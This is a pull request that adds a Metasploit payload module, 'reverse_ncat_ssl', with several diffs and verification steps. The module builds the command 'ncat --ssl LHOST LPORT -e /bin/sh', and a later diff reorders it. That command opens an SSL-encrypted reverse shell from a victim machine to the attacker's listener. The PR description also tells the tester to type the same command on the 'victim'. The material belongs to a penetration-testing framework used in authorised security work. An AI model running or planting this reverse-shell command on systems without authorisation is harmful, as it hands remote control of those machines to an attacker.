### PR TITLE
add reverse ncat ssl

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'

--- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -45,7 +45,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "ncat --ssl #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+    "ncat -e /bin/sh --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
   end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Reverse TCP (via ncat)',
+      'Description'   => 'Creates an interactive shell via ncat, utilising ssl mode',
+      'Author'        => 'C_Sto',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'ncat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    "ncat --ssl #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+  end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -16,17 +16,17 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (via ncat)',
-      'Description'   => 'Creates an interactive shell via ncat, utilising ssl mode',
-      'Author'        => 'C_Sto',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'ncat',
-      'Payload'       =>
+      'Name'        => 'Unix Command Shell, Reverse TCP (via ncat)',
+      'Description' => 'Creates an interactive shell via ncat, utilising ssl mode',
+      'Author'      => 'C_Sto',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcpSsl,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'ncat',
+      'Payload'     =>
         {
           'Offsets' => { },
           'Payload' => ''
@@ -38,7 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
-    return super + command_string
+    super + command_string
   end
 
   #


### PR DESCRIPTION
Adds reverse ncat payload/handler

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Start multi/handler
- [x] Set payload  cmd/unix/reverse_ncat_ssl
- [x] Listen for connection
- [x] On victim, type `ncat --ssl -e /bin/sh <ip> <port>`


